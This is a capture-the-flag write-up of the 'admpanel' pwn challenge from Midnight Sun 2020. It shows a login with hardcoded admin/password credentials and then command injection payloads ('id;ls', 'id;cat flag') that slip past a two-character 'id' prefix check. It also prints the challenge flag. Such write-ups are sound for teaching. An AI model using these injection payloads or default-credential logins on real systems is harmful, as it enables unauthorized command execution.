## admpanel

* **Category:**  Pwn
* **Points:** 63 
* **Author(s):** b0uldrr
* **Date:** 4/4/20

---

### Challenge
```
We found this legacy admin panel. Someone has patched it though :(

settings Service: nc admpanel-01.play.midnightsunctf.se 31337 

cloud_download Download: admpanel.tar.gz 
```

### Downloads
* [admpanel](admpanel)

---

### Solution

Running the provided executable shows a help menu with two interesting options:
* The Authenticate option prompts for a username.
* The Execute Command option will execute system commands but won't work until you have successfully logged in.

```
tmp@localhost:~/ctf/midnightsun/admpanel$ ./admpanel 
LOG: [OPERATION: CONNECT] Todo: log IP address for traceability!
---=-=-=-=-=-=-=-=-=---
-      Admin panel    -
-
- [0] - Help
- [1] - Authenticate
- [2] - Execute command
- [3] - Exit
---=-=-=-=-=-=-=-=-=---
 > 1
  Input username: test
LOG: [OPERATION: AUTHENTICATE] Error: Invalid username.
 > 2
LOG: [OPERATION: EXEC] Error: unauthenticated user tried to execute a command.
```

I opened the binary in Ghidra and found the functions for those options.

We can see on lines 10 and 14 that the admin username and password has been hardcoded to "admin" and "password".

![authenticate](images/authenticate_function.png)

Great, so now that we can log in we can try to execute some commands. Unfortunatley we are told that the only command we are permitted to use is 'id':

```
tmp@localhost:~/ctf/midnightsun/admpanel$ ./admpanel 
LOG: [OPERATION: CONNECT] Todo: log IP address for traceability!
---=-=-=-=-=-=-=-=-=---
-      Admin panel    -
-
- [0] - Help
- [1] - Authenticate
- [2] - Execute command
- [3] - Exit
---=-=-=-=-=-=-=-=-=---
 > 1
  Input username: admin
  Input password: password
 > 2
  Command to execute: ls
Any other commands than `id` have been disabled due to security concerns.
LOG: [OPERATION: EXEC_HONEYPOT] [USERNAME: admin
] ls

 > 
```
However, looking at the function to execute commands in Ghidra, we can see on line 14 that the program only checks whether the first 2 characters of your command are equal to 'id' before executing it with system(), it doesn't actually check the length of the command or anything after the first 2 characters. 

![execute](images/execute_command_function.png)

As long as our first 2 characters are 'id', we can append additional commands separated by a semicolon. Appending the 'ls' command, I found a file named "flag", and using cat I printed its contents. Final payload of `id;cat flag`

```
tmp@localhost:~/ctf/midnightsun/admpanel$ nc admpanel-01.play.midnightsunctf.se 31337
---=-=-=-=-=-=-=-=-=---
-      Admin panel    -
-
- [0] - Help
- [1] - Authenticate
- [2] - Execute command
- [3] - Exit
---=-=-=-=-=-=-=-=-=---
 > 1
  Input username: admin
  Input password: password
 > 2
  Command to execute: id;ls      
uid=999(ctf) gid=999(ctf) groups=999(ctf)
chall
flag
redir.sh
 > 2
  Command to execute: id;cat flag
uid=999(ctf) gid=999(ctf) groups=999(ctf)
midnight{n3v3r_4sk_b0bb_to_d0_S0m3TH4Ng}
```

**Flag** 
```
midnight{n3v3r_4sk_b0bb_to_d0_S0m3TH4Ng}
```
